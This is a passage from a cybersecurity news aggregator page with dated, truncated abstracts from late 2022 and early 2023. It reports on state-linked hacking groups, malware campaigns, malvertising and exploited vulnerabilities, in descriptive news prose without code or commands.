New research has linked the operations of a politically motivated hacktivist group known as Moses Staff to another nascent threat actor named Abraham's Ax that emerged in November 2022. This is based on "several commonalities across the iconography, videography, and leak sites used by the groups, suggesting they are likely operated by the same entity," Secureworks Counter Threat Unit (CTU) said in a report shared with The Hacker News. Moses Staff, tracked by the cybersecurity firm under the moniker Cobalt Sapling, made its first appearance on the threat landscape in September 2021 with the goal of primarily targeting Israeli organizations. The geopolitical group is believed to be sponsored by the Iranian government and has since been linked to a string of espionage and sabotage attacks that make use of tools like StrifeWater RAT and open source utilities such as DiskCryptor to harvest sensitive information and lock victim data on infected hosts. The cr... (The Hacker News)
January 25, 2023
North Korean Hackers Turn to Credential Harvesting in Latest Wave of Cyberattacks Full Text
Abstract
A North Korean nation-state group notorious for crypto heists has been attributed to a new wave of malicious email attacks as part of a "sprawling" credential harvesting activity targeting a number of industry verticals, marking a significant shift in its strategy. The state-aligned threat actor is being tracked by Proofpoint under the name TA444, and by the larger cybersecurity community as APT38, BlueNoroff, Copernicium, and Stardust Chollima. TA444 is "utilizing a wider variety of delivery methods and payloads alongside blockchain-related lures, fake job opportunities at prestigious firms, and salary adjustments to ensnare victims," the enterprise security firm said in a report shared with The Hacker News. The advanced persistent threat is something of an aberration among state-sponsored groups in that its operations are financially motivated and geared towards generating illicit revenue for the Hermit Kingdom. To that end, the attacks employ phishin... (The Hacker News)
January 25, 2023
DragonSpark threat actor avoids detection using Golang source code Interpretation Full Text
Abstract
Chinese threat actor tracked as DragonSpark targets organizations in East Asia with Golang malware to evade detection. SentinelOne researchers spotted a Chinese-speaking actor, tracked as DragonSpark, that is targeting organizations in East Asia. The... (Security Affairs)
January 24, 2023
Chinese Hackers Utilize Golang Malware in DragonSpark Attacks to Evade Detection Full Text
Abstract
Organizations in East Asia are being targeted by a likely Chinese-speaking actor dubbed DragonSpark while employing uncommon tactics to go past security layers. "The attacks are characterized by the use of the little known open source SparkRAT and malware that attempts to evade detection through Golang source code interpretation," SentinelOne said in an analysis published today. A striking aspect of the intrusions is the consistent use of SparkRAT to conduct a variety of activities, including stealing information, obtaining control of an infected host, or running additional PowerShell instructions. The threat actor's end goals remain unknown as yet, although espionage or cybercrime is likely to be the motive. DragonSpark's ties to China stem from the use of the China Chopper web shell to deploy malware – a widely used attack pathway among Chinese threat actors. Furthermore, not only do the open source tools used in the cyber assaults originate from develope... (The Hacker News)
January 23, 2023
Threat Actors Turn to Sliver as Open Source Alternative to Popular C2 Frameworks Full Text
Abstract
The legitimate command-and-control (C2) framework known as Sliver is gaining more traction from threat actors as it emerges as an open source alternative to Cobalt Strike and Metasploit. The findings come from Cybereason, which detailed its inner workings in an exhaustive analysis last week. Sliver, developed by cybersecurity company BishopFox, is a Golang-based cross-platform post-exploitation framework that's designed to be used by security professionals in their red team operations. Its myriad features for adversary simulation – including dynamic code generation, in-memory payload execution, and process injection – have also made it an appealing tool for threat actors looking to gain elevated access to the target system upon gaining an initial foothold. In other words, the software is used as a second stage to conduct the next steps of the attack chain after already compromising a machine using one of the initial intrusion vectors such as spear-phishing or exploitatio... (The Hacker News)
January 23, 2023
Chinese Group Targeting Vulnerable Cloud Providers, Apps Full Text
Abstract
Cybersecurity researchers say a Chinese for-profit threat group tracked as 8220 Gang is targeting cloud providers and poorly secured applications with a custom-built crypto miner and IRC bot. (Cyware)
January 20, 2023
Chinese hackers used recently patched FortiOS SSL-VPN flaw as a zero-day in October Full Text
Abstract
An alleged Chinese threat actor was observed exploiting the recently patched CVE-2022-42475 vulnerability in FortiOS SSL-VPN. Researchers from Mandiant reported that suspected Chinese threat actors exploited the recently patched CVE-2022-42475 vulnerability... (Security Affairs)
January 19, 2023
New Research Delves into the World of Malicious LNK Files and Hackers Behind Them Full Text
Abstract
Cybercriminals are increasingly leveraging malicious LNK files as an initial access method to download and execute payloads such as Bumblebee, IcedID, and Qakbot. A recent study by cybersecurity experts has shown that it is possible to identify relationships between different threat actors by analyzing the metadata of malicious LNK files, uncovering information such as the specific tools and techniques used by different groups of cybercriminals, as well as potential links between seemingly unrelated attacks. "With the increasing usage of LNK files in attack chains, it's logical that threat actors have started developing and using tools to create such files," Cisco Talos researcher Guilherme Venere said in a report shared with The Hacker News. This comprises tools like NativeOne's mLNK Builder and Quantum Builder, which allow subscribers to generate rogue shortcut files and evade security solutions. Some of the major malware families that have used LNK file... (The Hacker News)
January 17, 2023
Hackers Can Abuse Legitimate GitHub Codespaces Feature to Deliver Malware Full Text
Abstract
New research has found that it is possible for threat actors to abuse a legitimate feature in GitHub Codespaces to deliver malware to victim systems. GitHub Codespaces is a cloud-based configurable development environment that allows users to debug, maintain, and commit changes to a given codebase from a web browser or via an integration in Visual Studio Code. It also comes with a port forwarding feature that makes it possible to access a web application that's running on a particular port within the codespace directly from the browser on a local machine for testing and debugging purposes. "You can also forward a port manually, label forwarded ports, share forwarded ports with members of your organization, share forwarded ports publicly, and add forwarded ports to the codespace configuration," GitHub explains in its documentation. It's important to note here that any forwarded port that's made public will also permit any party with knowledge of the URL... (The Hacker News)
January 13, 2023
Pro-Russia group NoName057(16) targets Ukraine and NATO countries Full Text
Abstract
A Pro-Russian group named NoName057(16) is targeting organizations in Ukraine and NATO countries with DDoS attacks. A Pro-Russian cybercrime group named NoName057(16) (aka 05716nnm or Nnm05716) is behind a wave of DDoS attacks against organizations... (Security Affairs)
January 10, 2023
StrongPity Hackers Distribute Trojanized Telegram App to Target Android Users Full Text
Abstract
The advanced persistent threat (APT) group known as StrongPity has targeted Android users with a trojanized version of the Telegram app through a fake website that impersonates a video chat service called Shagle. "A copycat website, mimicking the Shagle service, is used to distribute StrongPity's mobile backdoor app," ESET malware researcher Lukáš Štefanko said in a technical report. "The app is a modified version of the open source Telegram app, repackaged with StrongPity backdoor code." StrongPity, also known by the names APT-C-41 and Promethium, is a cyberespionage group active since at least 2012, with a majority of its operations focused on Syria and Turkey. The existence of the group was first publicly reported by Kaspersky in October 2016. The threat actor's campaigns have since expanded to encompass more targets across Africa, Asia, Europe, and North America, with the intrusions leveraging watering hole attacks and phishing messages to ac... (The Hacker News)
January 9, 2023
Automated Libra Group Adopts New Tricks For Long Running Campaign Full Text
Abstract
Automated Libra, a South African threat actor, has improved its technique that includes leveraging cloud platform resources for cryptocurrency mining. The group has been evolving its capabilities with CAPTCHA bypass and Play and Run techniques to abuse free cloud resources. Users are suggested to a... (Cyware)
January 09, 2023
Hackers Can Abuse Visual Studio Marketplace to Target Developers with Malicious Extensions Full Text
Abstract
A new attack vector targeting the Visual Studio Code extensions marketplace could be leveraged to upload rogue extensions masquerading as their legitimate counterparts with the goal of mounting supply chain attacks. The technique "could act as an entry point for an attack on many organizations," Aqua security researcher Ilay Goldman said in a report published last week. VS Code extensions, curated via a marketplace made available by Microsoft, allow developers to add programming languages, debuggers, and tools to the VS Code source-code editor to augment their workflows. "All extensions run with the privileges of the user that has opened the VS Code without any sandbox," Goldman said, explaining the potential risks of using VS Code extensions. "This means that the extension can install any program on your computer including ransomwares, wipers, and more." To that end, Aqua found that not only is it possible for a threat actor to impersonate a po... (The Hacker News)
January 08, 2023
Russian Turla Hackers Hijack Decade-Old Malware Infrastructure to Deploy New Backdoors Full Text
Abstract
The Russian cyberespionage group known as Turla has been observed piggybacking on attack infrastructure used by a decade-old malware to deliver its own reconnaissance and backdoor tools to targets in Ukraine. Google-owned Mandiant, which is tracking the operation under the uncategorized cluster moniker UNC4210, said the hijacked servers correspond to a variant of a commodity malware called ANDROMEDA (aka Gamarue) that was uploaded to VirusTotal in 2013. "UNC4210 re-registered at least three expired ANDROMEDA command-and-control (C2) domains and began profiling victims to selectively deploy KOPILUWAK and QUIETCANARY in September 2022," Mandiant researchers said in an analysis published last week. Turla, also known by the names Iron Hunter, Krypton, Uroburos, Venomous Bear, and Waterbug, is an elite nation-state outfit that primarily targets government, diplomatic, and military organizations using a large set of custom malware. Since the onset of Russia's milit... (The Hacker News)
January 7, 2023
Reuters: Russian hackers targeted U.S. nuclear scientists Full Text
Abstract
A Russian hacking team known as Cold River targeted three nuclear research laboratories in the United States this past summer, according to internet records reviewed by Reuters and five cyber security experts. (Cyware)
January 6, 2023
Russian Turla Cyberspies Leveraged Other Hackers’ USB-Delivered Malware Full Text
Abstract
Active since at least 2006 and linked to the Russian government, the cyberespionage group is also tracked as Snake, Venomous Bear, Krypton, and Waterbug, and has been historically associated with the use of the ComRAT malware. (Cyware)
January 05, 2023
Blind Eagle Hackers Return with Refined Tools and Sophisticated Infection Chain Full Text
Abstract
A financially motivated threat actor tracked as Blind Eagle has resurfaced with a refined toolset and an elaborate infection chain as part of its attacks targeting organizations in Colombia and Ecuador. Check Point's latest research offers new insights into the Spanish-speaking group's tactics and techniques, including the use of sophisticated tools and government-themed lures to activate the kill chain. Also tracked under the name APT-C-36, Blind Eagle is notable for its narrow geographical focus and launching indiscriminate attacks against South American nations since at least 2018. Blind Eagle's operations have been documented by Trend Micro in September 2021, uncovering a spear-phishing campaign primarily aimed at Colombian entities designed to deliver a commodity malware known as BitRAT, with a lesser focus towards targets in Ecuador, Spain, and Panama. Attack chains commence with phishing emails containing a booby-trapped link that, when clicked, leads t... (The Hacker News)
January 5, 2023
How hackers might be exploiting ChatGPT Full Text
Abstract
The popular AI chatbot ChatGPT might be used by threat actors to easily hack into target networks. Original post at https://cybernews.com/security/hackers-exploit-chatgpt/ Cybernews research team discovered that the AI-based chatbot ChatGPT... (Security Affairs)
January 5, 2023
Hackers Using a New Undetectable SaaS-to-SaaS Phishing Technique Full Text
Abstract
Besides email, hackers are now shifting toward other delivery methods such as video conferencing platforms, workforce messaging apps, cloud-based file-sharing platforms, and SMS messages. Hackers are actively using multi-stage cloud phishing techniques that combine traditional phishing with second-phase or... (Cyware)
January 03, 2023
Hackers Using Stolen Bank Information to Trick Victims into Downloading BitRAT Malware Full Text
Abstract
A new malware campaign has been observed using sensitive information stolen from a bank as a lure in phishing emails to drop a remote access trojan called BitRAT. The unknown adversary is believed to have hijacked the IT infrastructure of a Colombian cooperative bank, using the information to craft convincing decoy messages to lure victims into opening suspicious Excel attachments. The discovery comes from cybersecurity firm Qualys, which found evidence of a database dump comprising 418,777 records that's said to have been obtained by exploiting SQL injection faults. The leaked details include Cédula numbers (a national identity document issued to Colombian citizens), email addresses, phone numbers, customer names, payment records, salary details, and addresses, among others. There are no signs that the information has been previously shared on any forums in the darknet or clear web, suggesting that the threat actors themselves got access to customer data to mount the phi... (The Hacker News)
January 3, 2023
Hackers Celebrated Christmas Week with Malicious PyTorch Dependency Full Text
Abstract
PyTorch team has identified a malicious dependency within its framework library. The package was the homonym for the torchtriton dependency. Exploiting it, a hacker could successfully trigger dependency confusion attacks, compromising multiple systems. PyTorch admins advised users to uninstall the... (Cyware)
December 28, 2022
Hackers abuse Google Ads to spread malware in legit software Full Text
Abstract
Malware operators have been increasingly abusing the Google Ads platform to spread malware to unsuspecting users searching for popular software products. (BleepingComputer)
December 28, 2022
Hackers Target WordPress Gift Card Plugin to Upload Backdoors Full Text
Abstract
A critical vulnerability has been found in the WordPress plugin YITH WooCommerce Gift Cards, which has over 50,000 installations worldwide. The bug, tracked as CVE-2022-45359, is being actively abused by threat actors. An unauthenticated hacker can upload files to vulnerable sites, completely taking over a compro... (Cyware)
December 27, 2022
BlueNoroff Introduces New Methods Bypassing MoTW Full Text
Abstract
BlueNoroff group introduced new file types to evade Mark-of-the-Web (MOTW) security measures. It expanded file types, tweaked infection methods, and created numerous fake domains impersonating venture capital companies and banks. (Cyware)
December 26, 2022
IcedID Operators Abuse Google Ads in Malvertising Campaign Full Text
Abstract
Trend Micro noted a new distribution trend for the IcedID botnet via Google pay-per-click (PPC) ads, aka malvertising. The adversaries behind IcedID malware erected fake websites of legitimate organizations and well-known applications to lure online users. Attackers also drop a new loader via an MS ... Cyware
December 22, 2022
FIN7 hackers create auto-attack platform to breach Exchange servers Full Text
Abstract
The notorious FIN7 hacking group uses an auto-attack system that exploits Microsoft Exchange and SQL injection vulnerabilities to breach corporate networks, steal data, and select targets for ransomware attacks based on financial size. BleepingComputer
December 22, 2022
XLLing in Excel - threat actors using malicious add-ins Full Text
Abstract
Cisco Talos highlights a new vector for delivering malicious code to Microsoft Excel: malicious add-ins, specifically XLL files. Although XLL files have been supported since early versions of Excel, malicious actors started using them relatively recently. Cyware
December 20, 2022
Russian hackers targeted petroleum refining company in NATO state Full Text
Abstract
A hacking group associated with Russia’s Federal Security Service (FSB) unsuccessfully attempted to compromise a large petroleum refining company within a NATO member state at the end of August, according to a new report. Cyware
December 15, 2022
Cyber warfare group caused AIIMS hack: sources - ET CISO Full Text
Abstract
A cyber warfare group backed by a “neighbouring” nation’s government was involved in the cyberattack on servers of the All India Institute of Medical Sciences (AIIMS), two sources aware of a government probe into the breach said. Cyware
December 15, 2022
Hackers target Japanese politicians with new MirrorStealer malware Full Text
Abstract
A hacking group tracked as MirrorFace has been targeting Japanese politicians for weeks before the House of Councilors election in July 2022, using a previously undocumented credentials stealer named 'MirrorStealer.' BleepingComputer
December 12, 2022
Evilnum group targets legal entities with a new Janicab variant Full Text
Abstract
A hack-for-hire group dubbed Evilnum is targeting travel and financial entities with the new Janicab malware variant. Kaspersky researchers reported that a hack-for-hire group dubbed Evilnum is targeting travel and financial entities. The attacks ... Security Affairs
December 10, 2022
Hackers earn $989,750 for 63 zero-days exploited at Pwn2Own Toronto Full Text
Abstract
Pwn2Own Toronto 2022 has ended with competitors earning $989,750 for 63 zero-day exploits (and multiple bug collisions) targeting consumer products between December 6th and December 9th. BleepingComputer
December 05, 2022
Sneaky hackers reverse defense mitigations when detected Full Text
Abstract
A financially motivated threat actor is hacking telecommunication service providers and business process outsourcing firms, actively reversing defensive mitigations applied when the breach is detected. BleepingComputer
December 05, 2022
Hackers hijack Linux devices using PRoot isolated filesystems Full Text
Abstract
Hackers are abusing the open-source Linux PRoot utility in BYOF (Bring Your Own Filesystem) attacks to provide a consistent repository of malicious tools that work on many Linux distributions. BleepingComputer
December 02, 2022
Hackers Sign Android Malware Apps with Compromised Platform Certificates Full Text
Abstract
Platform certificates used by Android smartphone vendors like Samsung, LG, and MediaTek have been found to be abused to sign malicious apps. The findings were first discovered and reported by Google reverse engineer Łukasz Siewierski on Thursday. "A platform certificate is the application signing certificate used to sign the 'android' application on the system image," a report filed through the Android Partner Vulnerability Initiative (AVPI) reads. "The 'android' application runs with a highly privileged user id – android.uid.system – and holds system permissions, including permissions to access user data." This effectively means that a rogue application signed with the same certificate can gain the same highest level of privileges as the Android operating system, permitting it to harvest all kinds of sensitive information from a compromised device. The list of malicious Android app packages that have abused the certificates is below - com. ... The Hacker News
December 02, 2022
BlackProxies proxy service increasingly popular among hackers Full Text
Abstract
A new residential proxy market is becoming popular among hackers, cybercriminals, phishers, scalpers, and scammers, selling access to a million claimed proxy IP addresses worldwide. BleepingComputer
December 02, 2022
Hackers Exploiting Redis Vulnerability to Deploy New Redigo Malware on Servers Full Text
Abstract
A previously undocumented Go-based malware is targeting Redis servers with the goal of taking control of the infected systems and likely building a botnet network. The attacks involve taking advantage of a critical security vulnerability in the open source, in-memory, key-value store that was disclosed earlier this year to deploy Redigo, according to cloud security firm Aqua. Tracked as CVE-2022-0543 (CVSS score: 10.0), the weakness pertains to a case of sandbox escape in the Lua scripting engine that could be leveraged to attain remote code execution. This is not the first time the flaw has come under active exploitation, what with Juniper Threat Labs uncovering attacks perpetrated by the Muhstik botnet in March 2022 to execute arbitrary commands. The Redigo infection chain is similar in that the adversaries scan for exposed Redis servers on port 6379 to establish initial access, following it up by downloading a shared library "exp_lin.so" from a remote server. The Hacker News
December 01, 2022
North Korea Hackers Using New “Dolphin” Backdoor to Spy on South Korean Targets Full Text
Abstract
The North Korea-linked ScarCruft group has been attributed to a previously undocumented backdoor called Dolphin that the threat actor has used against targets located in its southern counterpart. "The backdoor [...] has a wide range of spying capabilities, including monitoring drives and portable devices and exfiltrating files of interest, keylogging and taking screenshots, and stealing credentials from browsers," ESET researcher Filip Jurčacko said in a new report published today. Dolphin is said to be selectively deployed, with the malware using cloud services like Google Drive for data exfiltration as well as command-and-control. The Slovak cybersecurity company said it found the implant deployed as a final-stage payload as part of a watering hole attack in early 2021 directed against a South Korean digital newspaper. The campaign, first uncovered by Kaspersky and Volexity last year, entailed the weaponization of two Internet Explorer flaws (CVE-2020-1380 ... The Hacker News
November 30, 2022
Crafty threat actor uses ‘aged’ domains to evade security platforms Full Text
Abstract
A sophisticated threat actor named 'CashRewindo' has been using aged domains in global malvertising campaigns that lead to investment scam sites. BleepingComputer
November 30, 2022
Chinese Cyber Espionage Hackers Using USB Devices to Target Entities in Philippines Full Text
Abstract
A threat actor with a suspected China nexus has been linked to a set of espionage attacks in the Philippines that primarily relies on USB devices as an initial infection vector. Mandiant, which is part of Google Cloud, is tracking the cluster under its uncategorized moniker UNC4191. An analysis of the artifacts used in the intrusions indicates that the campaign dates as far back as September 2021. "UNC4191 operations have affected a range of public and private sector entities primarily in Southeast Asia and extending to the U.S., Europe, and APJ," researchers Ryan Tomcik, John Wolfram, Tommy Dacanay, and Geoff Ackerman said. "However, even when targeted organizations were based in other locations, the specific systems targeted by UNC4191 were also found to be physically located in the Philippines." The reliance on infected USB drives to propagate the malware is unusual, if not new. The Raspberry Robin worm, which has evolved into an initial access service ... The Hacker News
November 29, 2022
Threat actors are offering access to corporate networks via unauthorized Fortinet VPN access Full Text
Abstract
Cyble observed Initial Access Brokers (IABs) offering access to enterprise networks compromised via a critical flaw in Fortinet products. Researchers at Cyble have observed initial access brokers (IABs) selling access to enterprise networks likely ... Security Affairs
November 29, 2022
Hackers Using Trending TikTok ‘Invisible Challenge’ to Spread Malware Full Text
Abstract
Threat actors are capitalizing on a popular TikTok challenge to trick users into downloading information-stealing malware, according to new research from Checkmarx. The trend, called Invisible Challenge, involves applying a filter known as Invisible Body that just leaves behind a silhouette of the person's body. But the fact that individuals filming such videos could be undressed has led to a nefarious scheme wherein the attackers post TikTok videos with links to rogue software dubbed "unfilter" that purport to remove the applied filters. "Instructions to get the 'unfilter' software deploy WASP stealer malware hiding inside malicious Python packages," Checkmarx researcher Guy Nachshon said in a Monday analysis. The WASP stealer (aka W4SP Stealer) is a malware that's designed to steal users' passwords, Discord accounts, cryptocurrency wallets, and other sensitive information. The TikTok videos posted by the attackers, @learncyber and ... The Hacker News
November 28, 2022
Russian Hacker Groups Xenotime and Kamacite Target Dutch LNG Terminal Full Text
Abstract
Russian hackers have been doing “exploratory research” into the systems of the Dutch LNG terminals, trying to find ways into the systems, American cybersecurity company Dragos has reported. Yahoo Finance
November 27, 2022
Abandoned Boa Servers Abused by Chinese Attackers to Target Critical Industries Full Text
Abstract
The Boa web server was discontinued in 2005; however, different vendors still implement it across a variety of IoT devices, ranging from routers to cameras, and in popular SDKs. Cyware Alerts - Hacker News
November 25, 2022
Bahamut Cyber Mercenary Group Targets Android Users with Fake VPN Apps Full Text
Abstract
A hacking-for-hire group is distributing malicious apps through a fake SecureVPN website that enables Android apps to be downloaded from Google Play, say researchers at ESET. ESET Security
November 24, 2022
Ducktail Group Brings New Arsenal and Evasion Tactics to Uplift Its Attack Game Full Text
Abstract
WithSecure researchers have published an advisory about new developments of the Ducktail infostealer. The recent campaigns feature new tricks to spear-phish targets via WhatsApp. Cyware Alerts - Hacker News
November 24, 2022
Threat actors exploit discontinued Boa web servers to target critical infrastructure Full Text
Abstract
Microsoft reported that hackers have exploited flaws in a now-discontinued web server called Boa in attacks against critical industries. Microsoft experts believe that threat actors behind a malicious campaign aimed at Indian critical infrastructure ... Security Affairs
November 24, 2022
Bahamut Cyber Espionage Hackers Targeting Android Users with Fake VPN Apps Full Text
Abstract
The cyber espionage group known as Bahamut has been attributed as behind a highly targeted campaign that infects users of Android devices with malicious apps designed to extract sensitive information. The activity, which has been active since January 2022, entails distributing rogue VPN apps through a fake SecureVPN website set up for this purpose, Slovak cybersecurity firm ESET said in a new report shared with The Hacker News. At least eight different variants of the spyware apps have been discovered to date, with them being trojanized versions of legitimate VPN apps like SoftVPN and OpenVPN. The tampered apps and their updates are pushed to users through the fraudulent website. It's also suspected that the targets are carefully selected, since launching the app requires the victim to enter an activation key to enable the features. This implies the use of an undetermined distribution vector, although past evidence shows that it could take the form of spear-phishing emails ... The Hacker News
November 23, 2022
Hackers Exploiting Abandoned Boa Web Servers to Target Critical Industries Full Text
Abstract
Microsoft on Tuesday disclosed the intrusion activity aimed at Indian power grid entities earlier this year likely involved the exploitation of security flaws in a now-discontinued web server called Boa. The tech behemoth's cybersecurity division said the vulnerable component poses a "supply chain risk that may affect millions of organizations and devices." The findings build on a prior report published by Recorded Future in April 2022, which delved into a sustained campaign orchestrated by suspected China-linked adversaries to strike critical infrastructure organizations in India. The cybersecurity firm attributed the attacks to a previously undocumented threat cluster called Threat Activity Group 38. While the Indian government described the attacks as unsuccessful "probing attempts," China denied it was behind the campaign. The connections to China stem from the use of a modular backdoor dubbed ShadowPad, which is known to be shared among several ... The Hacker News
November 22, 2022
Nighthawk: An Up-and-Coming Pentest Tool Likely to Gain Threat Actor Notice Full Text
Abstract
Proofpoint researchers expect Nighthawk will show up in threat actor campaigns as the tool becomes more widely recognized or as threat actors search for new, more capable tools to use against targets. Proofpoint
November 21, 2022
DEV-0569 Group Switches Tactics, Abuses Google Ads to Deliver Payloads Full Text
Abstract
DEV-0569 uses a malware downloader, BatLoader, that drops the next stage payloads (via PowerShell commands), including Royal ransomware and Cobalt Strike Beacon implant. Cyware Alerts - Hacker News
November 21, 2022
Attackers bypass Coinbase and MetaMask 2FA via TeamViewer, fake support chat Full Text
Abstract
A crypto-stealing phishing campaign is underway to bypass multi-factor authentication and gain access to accounts on Coinbase, MetaMask, Crypto.com, and KuCoin and steal cryptocurrency. BleepingComputer
November 19, 2022
DEV-0569 group uses Google Ads to distribute Royal Ransomware Full Text
Abstract
Microsoft warns that a threat actor, tracked as DEV-0569, is using Google Ads to distribute the recently discovered Royal ransomware. Researchers from the Microsoft Security Threat Intelligence team warned that a threat actor, tracked as DEV-0569, ... Security Affairs
November 19, 2022
Microsoft Warns of Hackers Using Google Ads to Distribute Royal Ransomware Full Text
Abstract
A developing threat activity cluster has been found using Google Ads in one of its campaigns to distribute various post-compromise payloads, including the recently discovered Royal ransomware. Microsoft, which spotted the updated malware delivery method in late October 2022, is tracking the group under the name DEV-0569. "Observed DEV-0569 attacks show a pattern of continuous innovation, with regular incorporation of new discovery techniques, defense evasion, and various post-compromise payloads, alongside increasing ransomware facilitation," the Microsoft Security Threat Intelligence team said in an analysis. The threat actor is known to rely on malvertising to point unsuspecting victims to malware downloader links that pose as software installers for legitimate apps like Adobe Flash Player, AnyDesk, LogMeIn, Microsoft Teams, and Zoom. The malware downloader, a strain referred to as BATLOADER, is a dropper that functions as a conduit to distribute next-stage payloads ... The Hacker News
November 19, 2022
Chinese ‘Mustang Panda’ Hackers Actively Targeting Governments Worldwide Full Text
Abstract
A notorious advanced persistent threat actor known as Mustang Panda has been linked to a spate of spear-phishing attacks targeting government, education, and research sectors across the world. The primary targets of the intrusions from May to October 2022 included countries in the Asia Pacific region such as Myanmar, Australia, the Philippines, Japan, and Taiwan, cybersecurity firm Trend Micro said in a Friday report. Mustang Panda, also called Bronze President, Earth Preta, HoneyMyte, and Red Lich, is a China-based espionage actor believed to be active since at least July 2018. The group is known for its use of malware such as China Chopper and PlugX to collect data from compromised environments. Activities of the group chronicled by ESET, Google, Proofpoint, Cisco Talos, and Secureworks this year have revealed the threat actor's pattern of using PlugX (and its variant called Hodur) to infect a wide range of entities in Asia, Europe, the Middle East, and the Americas ... The Hacker News
November 18, 2022
Chinese hackers use Google Drive to drop malware on govt networks Full Text
Abstract
State-backed Chinese hackers launched a spearphishing campaign to deliver custom malware stored in Google Drive to government, research, and academic organizations worldwide. BleepingComputer
November 17, 2022
A Comprehensive Look at Emotet’s Fall 2022 Return Full Text
Abstract
TA542, an actor that distributes Emotet malware, has once again returned from an extensive break from delivering malicious emails. The actor was absent from the landscape for nearly four months but became active again in early November. Proofpoint
November 17, 2022
North Korean Hackers Targeting Europe and Latin America with Updated DTrack Backdoor Full Text
Abstract
Hackers tied to the North Korean government have been observed using an updated version of a backdoor known as Dtrack targeting a wide range of industries in Germany, Brazil, India, Italy, Mexico, Switzerland, Saudi Arabia, Turkey, and the U.S. "Dtrack allows criminals to upload, download, start or delete files on the victim host," Kaspersky researchers Konstantin Zykov and Jornt van der Wiel said in a report. The victimology patterns indicate an expansion to Europe and Latin America. Sectors targeted by the malware are education, chemical manufacturing, governmental research centers and policy institutes, IT service providers, utility providers, and telecommunication firms. Dtrack, also called Valefor and Preft, is the handiwork of Andariel, a subgroup of the Lazarus nation-state threat actor that's publicly tracked by the broader cybersecurity community using the monikers Operation Troy, Silent Chollima, and Stonefly. Discovered in September 2019, the malware ... The Hacker News
November 15, 2022
North Korean hackers target European orgs with updated malware Full Text
Abstract
North Korean hackers are using a new version of the DTrack backdoor to attack organizations in Europe and Latin America. BleepingComputer
November 15, 2022
Chinese hackers target government agencies and defense orgs Full Text
Abstract
The Chinese espionage APT (advanced persistent threat), tracked as 'Billbug' (aka Thrip, or Lotus Blossom), is currently running a 2022 campaign targeting government agencies and defense organizations in multiple Asian countries. BleepingComputer
November 15, 2022
Chinese State-Sponsored Actor Targets Certificate Authority, Government Agencies Across Asia Full Text
Abstract
Billbug (aka Lotus Blossom, Thrip) is a long-established advanced persistent threat (APT) group that is believed to have been active since at least 2009. The attackers use multiple dual-use tools in this attack campaign, as well as custom malware. Symantec
November 14, 2022
Worok Hackers Abuse Dropbox API to Exfiltrate Data via Backdoor Hidden in Images Full Text
Abstract
A recently discovered cyber espionage group dubbed Worok has been found hiding malware in seemingly innocuous image files, corroborating a crucial link in the threat actor's infection chain. Czech cybersecurity firm Avast said the purpose of the PNG files is to conceal a payload that's used to facilitate information theft. "What is noteworthy is data collection from victims' machines using Dropbox repository, as well as attackers using Dropbox API for communication with the final stage," the company said. The development comes a little over two months after ESET disclosed details of attacks carried out by Worok against high-profile companies and local governments located in Asia and Africa. Worok is believed to share tactical overlaps with a Chinese threat actor tracked as TA428. The Slovak cybersecurity company also documented Worok's compromise sequence, which makes use of a C++-based loader called CLRLoad to pave the way for an unknown PowerShell ... The Hacker News
November 13, 2022
Ukraine says Russian hacktivists use new Somnia ransomware Full Text
Abstract
Russian hacktivists have infected multiple organizations in Ukraine with a new ransomware strain called 'Somnia,' encrypting their systems and causing operational problems. BleepingComputer
November 12, 2022
Australia tells Medibank hackers: ‘We know who you are’ Full Text
Abstract
The Australian Federal Police claims to have identified the cybercriminals behind the Medibank ransomware attack, which compromised the personal data of 9.7 million customers. Tech Crunch
November 10, 2022
Conti Affiliates BlackByte and Black Basta Rotating Targets Full Text
Abstract
The threat ecosystem of Conti is growing stronger day by day, as evidenced by recent findings that it is drifting away from U.S. targets toward NATO-affiliated countries in Europe. Conti is forming new allies, developing new tools and techniques, and actively hacking critical ... Cyware Alerts - Hacker News
November 10, 2022
Russian military hackers linked to ransomware attacks in Ukraine Full Text
Abstract
A series of attacks targeting transportation and logistics organizations in Ukraine and Poland with Prestige ransomware since October have been linked to an elite Russian military cyberespionage group. BleepingComputer
November 10, 2022
Worok hackers hide new malware in PNGs using steganography Full Text
Abstract
A threat group tracked as 'Worok' hides malware within PNG images to infect victims' machines with information-stealing malware without raising alarms. BleepingComputer
November 9, 2022
Surveillance vendor exploited Samsung phone zero-days Full Text
Abstract
Google Project Zero researchers reported that a surveillance vendor is using three Samsung phone zero-day exploits. Google Project Zero disclosed three Samsung phone vulnerabilities, tracked as CVE-2021-25337, CVE-2021-25369 and CVE-2021-25370, that ... Security Affairs
November 09, 2022
New hacking group uses custom ‘Symatic’ Cobalt Strike loaders Full Text
Abstract
A previously unknown Chinese APT (advanced persistent threat) hacking group dubbed 'Earth Longzhi' targets organizations in East Asia, Southeast Asia, and Ukraine. BleepingComputer
November 9, 2022
Justice Blade Group Targets Saudi Arabian Giants Full Text
Abstract
The Justice Blade threat actor released data from outsourcing IT vendor Smart Link BPO Solutions. The vendor works with relatively large organizations and government agencies in the Kingdom of Saudi Arabia and other countries in the GCC. It is said that cybercriminals may have stolen CRM records, personal ... Cyware Alerts - Hacker News
November 7, 2022
‘Justice Blade’ Hackers are Targeting Saudi Arabia Full Text
Abstract
Threat actors calling themselves "Justice Blade" published leaked data from an outsourcing IT vendor. The group of threat actors calling themselves 'Justice Blade' published leaked data from Smart Link BPO Solutions, an outsourcing IT vendor working ... Security Affairs
November 7, 2022
Microsoft Accuses Chinese State-linked Actors of Abusing Vulnerability Disclosure Requirements Full Text
Abstract
Microsoft on Friday accused state-backed hackers in China of abusing the country’s vulnerability disclosure requirements in an effort to discover and develop zero-day exploits. The Record
November 03, 2022
Researchers Find Links b/w Black Basta Ransomware and FIN7 Hackers Full Text
Abstract
A new analysis of tools put to use by the Black Basta ransomware operation has identified ties between the threat actor and the FIN7 (aka Carbanak) group. This link "could suggest either that Black Basta and FIN7 maintain a special relationship or that one or more individuals belong to both groups," cybersecurity firm SentinelOne said in a technical write-up shared with The Hacker News. Black Basta, which emerged earlier this year, has been attributed to a ransomware spree that has claimed over 90 organizations as of September 2022, suggesting that the adversary is both well-organized and well-resourced. One notable aspect that makes the group stand out, per SentinelOne, is the fact that there have been no signs of its operators attempting to recruit affiliates or advertising the malware as a RaaS on darknet forums or crimeware marketplaces. This has raised the possibility that the Black Basta developers either cut out affiliates from the chain and deploy the ransomware ... The Hacker News
November 03, 2022
Hackers Using Rogue Versions of KeePass and SolarWinds Software to Distribute RomCom RAT Full Text
Abstract
